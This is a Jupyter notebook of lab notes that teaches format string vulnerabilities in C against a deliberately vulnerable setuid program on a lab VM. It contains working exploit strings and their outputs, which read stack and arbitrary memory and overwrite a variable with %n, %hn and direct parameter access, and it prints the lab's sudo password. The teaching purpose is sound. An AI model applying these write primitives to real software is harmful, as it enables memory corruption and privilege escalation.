# Format Strings
http://www.cplusplus.com/reference/cstdio/printf/?kw=printf

- `printf()` in C/C++ can print fixed strings as well as variables in many different formats
- the hello.c program passes its text directly as the format string; that is safe only because the text is a fixed literal with no format parameters
- the "Hello World!\n" string is technically the format string (devoid of the special escape sequences called format parameters)
- format parameters begin with a `%` sign; for each format parameter, the function expects a corresponding argument
- a format specifier follows this prototype:
`%[flags][width][.precision][length]specifier`

- the following parameters expect values as arguments

| Parameter | Output Type |
| --- | --- |
| %d | Decimal |
| %u | Unsigned decimal |
| %x | Hexadecimal |

- the following parameters expect pointers as arguments

| Parameter | Output Type |
| --- | --- |
| %s | String |
| %n | Number of bytes written so far |
| %p | Memory address |

In [15]:
# copy hello.c from booksrc folder
! cp booksrc/hello.c .
! ls -al hello.c

-rw-rw-r-- 1 seed seed 78 Aug  8 18:47 hello.c


In [18]:
! cat hello.c

#include <stdio.h>

int main() {
    printf("Hello World!\n");
    return 0;
}

In [16]:
# compile and run hello.c
! cp booksrc/compile.sh .
! chmod u+x compile.sh
! ./compile.sh hello.c hello.exe

In [17]:
! hello.exe

Hello World!


## The Format String Vulnerability
- the vulnerability: calling `printf(string)` instead of `printf("%s", string)` lets user-controlled text be interpreted as the format string
- compile and run fmt_vuln.c from the booksrc folder

```bash
$ ./compile.sh fmt_vuln.c fmt_vuln.exe
$ sudo chown root:root ./fmt_vuln.exe
$ sudo chmod u+s ./fmt_vuln.exe
$ ./fmt_vuln.exe testing
$ ./fmt_vuln.exe testing%x
$ ./fmt_vuln.exe $(perl -e 'print "%08x."x40')
```

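- the dump shows the same few four-byte words repeating, each with its bytes in reverse order (little-endian architecture)
- $ printf "\x25\x30\x38\x78\x2e\n"
    - the repeating bytes are the format string itself: `printf()` fetches its arguments from higher stack addresses, which is where the `text` buffer is stored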

In [48]:
! cp ./booksrc/fmt_vuln.c .
! cat fmt_vuln.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];
   static int test_val = -72;

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way to print user-controlled input:\n");
   printf("%s", text);

   printf("\nThe wrong way to print user-controlled input:\n");
   printf(text);

   printf("\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);

   exit(0);
}


In [None]:
! ./compile.sh fmt_vuln.c fmt_vuln.exe

In [33]:
# dees is the sudo password for the seed user
! echo dees | sudo -S chown root:root ./fmt_vuln.exe

[sudo] password for seed: 

In [34]:
# check the ownership of fmt_vuln.exe
! ls -al fmt_vuln.exe

-rwxrwxr-x 1 root root 8596 Aug  8 18:54 fmt_vuln.exe


In [35]:
! echo dees | sudo -S chmod u+s ./fmt_vuln.exe

[sudo] password for seed: 

In [36]:
! ls -al fmt_vuln.exe

-rwsrwxr-x 1 root root 8596 Aug  8 18:54 fmt_vuln.exe


In [38]:
# run fmt_vuln.exe
! ./fmt_vuln.exe

Usage: ./fmt_vuln.exe <text to print>


In [39]:
! ./fmt_vuln.exe testing

The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [43]:
# what if you provide %x as value
! ./fmt_vuln.exe testing%x

The right way to print user-controlled input:
testing%x
The wrong way to print user-controlled input:
testingbfffe840
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [44]:
! ./fmt_vuln.exe testing%s
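# notice that testing is printed twice: %s treats the first stack word as a pointer, and here it points to a copy of the input string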

The right way to print user-controlled input:
testing%s
The wrong way to print user-controlled input:
testingtesting%s
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [46]:
# this process can be repeated to examine stack memory
! ./fmt_vuln.exe $(perl -e 'print "%08x."x40')

The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way to print user-controlled input:
bfffe780.00000000.b7fff858.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [49]:
! fmt_vuln.exe $(perl -e 'print "%s."x40')

The right way to print user-controlled input:
%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.
The wrong way to print user-controlled input:
Segmentation fault


In [57]:
# the byte sequence 25 30 38 78 2e keeps repeating in the dump
# each four-byte word is printed byte-reversed because of the little-endian architecture
! perl -e 'print "\x25\x30\x38\x78\x2e"'

%08x.

## Reading from Arbitrary Memory Addresses
- `%s` format parameter can be used to read from arbitrary memory addresses
- part of the original format string can be used to supply an address to the %s format parameter
```bash
$ ./fmt_vuln.exe AAAA%08x.%08x.%08x.%08x
$ ./fmt_vuln.exe AAAA%08x.%08x.%08x.%s # get segfault
```
- if a valid memory address is used, this process could be used to read a string found at that memory address
```bash
$ env | grep '^PATH='
```
- compile and run booksrc/getenvaddr.c
```bash
$ ./compile.sh getenvaddr.c getenvaddr.exe
$ ./getenvaddr.exe PATH ./fmt_vuln.exe
```
- use the address of PATH as the argument for %s
```bash
$ ./fmt_vuln.exe $(printf "\xa0\xf3\xff\xbf")%08x.%08x.%08x.%s  # address 0xbffff3a0 with its bytes in reverse order
```

In [60]:
! ./fmt_vuln.exe AAAA.%08x.%08x.%08x.%08x
# notice that the fourth parameter reads its data from the beginning of the format string:
# 41414141 is AAAA

The right way to print user-controlled input:
AAAA.%08x.%08x.%08x.%08x
The wrong way to print user-controlled input:
AAAA.bfffe830.00000000.b7fff858.41414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [62]:
! ./fmt_vuln.exe AAAA%08x.%08x.%08x.%s
# why do we get a segfault? %s treats 0x41414141 (AAAA) as a pointer, and nothing is mapped at that address

The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
Segmentation fault


In [63]:
# how about we provide a valid memory address in place of AAAA
! env | grep '^PATH='

PATH=/usr/local/bin:/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin


In [64]:
# compile and run getenvaddr.c to find the memory address of an env variable relative to a target program
! cp ./booksrc/getenvaddr.c .

In [65]:
! cat getenvaddr.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
}


In [66]:
! ./compile.sh getenvaddr.c getenvaddr.exe

In [68]:
! ./getenvaddr.exe PATH ./fmt_vuln.exe

PATH will be at 0xbffff3a0


In [89]:
# let's try to read the value of PATH using fmt_vuln.exe
! ./fmt_vuln.exe $(perl -e 'print "\xa0\xf3\xff\xbf"')%08x.%08x.%08x.%s

The right way to print user-controlled input:
����%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
����bfffe830.00000000.b7fff858.sr/local/bin:/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [79]:
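# the output above starts at sr/local/bin, two bytes past the start of the value, so subtract 2 from the low address byte
! printf "%x" $((0xa0-2))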

9e

In [88]:
! ./fmt_vuln.exe $(perl -e 'print "\x9e\xf3\xff\xbf"')%08x.%08x.%08x.%s

The right way to print user-controlled input:
����%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
����bfffe830.00000000.b7fff858./usr/local/bin:/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin
[*] test_val @ 0x0804a02c = -72 0xffffffb8


## Writing to Arbitrary Memory Addresses
- the `%n` format parameter can be used to write to arbitrary memory addresses
- the debug statement has been printing the address and value of the `test_val` variable, which makes it a convenient target
```bash
$ ./fmt_vuln.exe $(printf "\x2c\xa0\x04\x08")%08x.%08x.%08x.%n  # test_val @ 0x0804a02c, bytes reversed
```
- the resulting value in the test variable depends on the number of bytes written before the `%n`
- this can be controlled to a greater degree by manipulating the field width option
```bash
$ ./fmt_vuln.exe $(printf "\x2c\xa0\x04\x08")%x%x%x%n
$ ./fmt_vuln.exe $(printf "\x2c\xa0\x04\x08")%x%x%100x%n
$ ./fmt_vuln.exe $(printf "\x2c\xa0\x04\x08")%x%x%400x%n
```

In [85]:
! fmt_vuln.exe testing

The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [87]:
# test_val is @ 0x0804a02c
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%08x.%08x.%08x.%n

The right way to print user-controlled input:
,�%08x.%08x.%08x.%n
The wrong way to print user-controlled input:
,�bfffe830.00000000.b7fff858.
[*] test_val @ 0x0804a02c = 31 0x0000001f


In [86]:
# without the zero-padded widths fewer bytes are written, so a smaller value is stored
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%x.%n

The right way to print user-controlled input:
,�%x.%x.%x.%n
The wrong way to print user-controlled input:
,�bfffe840.0.b7fff858.
[*] test_val @ 0x0804a02c = 24 0x00000018


In [90]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%100x.%n

The right way to print user-controlled input:
,�%x.%x.%100x.%n
The wrong way to print user-controlled input:
,�bfffe830.0.                                                                                            b7fff858.
[*] test_val @ 0x0804a02c = 116 0x00000074


In [91]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%200x.%n

The right way to print user-controlled input:
,�%x.%x.%200x.%n
The wrong way to print user-controlled input:
,�bfffe830.0.                                                                                                                                                                                                b7fff858.
[*] test_val @ 0x0804a02c = 216 0x000000d8


## Writing User-Controlled Values (0xaddress)
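- the above trick (manipulating the width) works for small numbers but not for large ones like memory addresses
- let's write 0xDDCCBBAA to the variable test_val, one byte at a time
- 0xAA goes to the least significant byte, 0xBB to the next byte, and so on; 0xDD goes to the most significant byte
- 0xAA -> 0x0804a02c
- 0xBB -> 0x0804a02d
- 0xCC -> 0x0804a02e
- 0xDD -> 0x0804a02f
- the four-byte JUNK words between the addresses give each additional `%x` an argument to consume, so that the `%n` after it picks up the next address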
```bash

$ printf "%d\n" $((0xaa - 21 + 8)) # 157: width needed when %x%x%8x%n stores 21
# or
$ echo $((0xaa - 21 + 8))
$ ./fmt_vuln.exe $(printf "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08")%x%x%8x%n # stores 45
$ echo $((0xaa-45+8)) # 133
```

In [95]:
# find out how many bytes are written with a trial width of 8
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%8x%n

The right way to print user-controlled input:
,�%x%x%8x%n
The wrong way to print user-controlled input:
,�bfffe8400b7fff858
[*] test_val @ 0x0804a02c = 21 0x00000015


In [98]:
# 0xaa is the target value; 21 is the count stored with width 8
!echo $(( 0xaa - 21 + 8))

157


In [97]:
# replace width 8 with 157
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%157x%n
# test_val = 0x000000aa

The right way to print user-controlled input:
,�%x%x%157x%n
The wrong way to print user-controlled input:
,�bfffe8400                                                                                                                                                     b7fff858
[*] test_val @ 0x0804a02c = 170 0x000000aa


In [99]:
# next write 0xbb, 0xcc, and 0xdd
# need one more %x%n pair for each additional address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%8x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%8x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8200b7fff858
[*] test_val @ 0x0804a02c = 45 0x0000002d


In [100]:
# what is the width so the final value is 0xaa
! echo $(( 0xaa-45+8 ))

133


In [101]:
# replace width 8 with 133
# to force the write of 0xaa
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8200                                                                                                                             b7fff858
[*] test_val @ 0x0804a02c = 170 0x000000aa


In [102]:
! echo $(( 0xbb - 0xaa ))

17


In [103]:
# now write 0xbb in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8200                                                                                                                             b7fff858         4b4e554a
[*] test_val @ 0x0804a02c = 48042 0x0000bbaa


In [104]:
! echo $(( 0xcc - 0xbb ))

17


In [105]:
# now write 0xcc in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n%17x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n%17x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8100                                                                                                                             b7fff858         4b4e554a         4b4e554a
[*] test_val @ 0x0804a02c = 13417386 0x00ccbbaa


In [None]:
# finally write 0xdd

In [106]:
! echo $(( 0xdd - 0xcc ))

17


In [107]:
# now write 0xdd in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n%17x%n%17x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8100                                                                                                                             b7fff858         4b4e554a         4b4e554a         4b4e554a
[*] test_val @ 0x0804a02c = -573785174 0xddccbbaa


## Direct Parameter Access
- a simplified way to exploit the format string vulnerability
- allows parameters to be accessed directly by using the dollar sign qualifier
    - e.g., `%N$d` accesses the Nth parameter and displays it as a decimal number

In [1]:
#include <stdio.h>
int main() {
    printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
}

/tmp/tmpga_vbkob.c: In function ‘main’:
     printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
            ^


7th: 70, 4th: 00040


In [1]:
# let's use direct parameter access with fmt_vuln.exe
! ./fmt_vuln.exe AAAA%x%x%x%x

The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbfffe8400b7fff85841414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [3]:
# access the fourth argument (beginning of the format string)
# $ is a special character in the shell, so it must be escaped
! ./fmt_vuln.exe AAAA%4\$x

The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


## Using Short Writes
- a `short` is typically a two-byte word; the `h` length modifier turns `%n` into `%hn`, which writes only two bytes
- this lets an entire four-byte value be written with just two `%hn` parameters

In [6]:
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%x%hn

The right way to print user-controlled input:
,�%x%x%x%hn
The wrong way to print user-controlled input:
,�bfffe8400b7fff858
[*] test_val @ 0x0804a02c = -65515 0xffff0015


In [8]:
! ./fmt_vuln.exe $(perl -e 'print "\x2e\xa0\x04\x08"')%4\$hn

The right way to print user-controlled input:
.�%4$hn
The wrong way to print user-controlled input:
.�
[*] test_val @ 0x0804a02c = 327608 0x0004ffb8
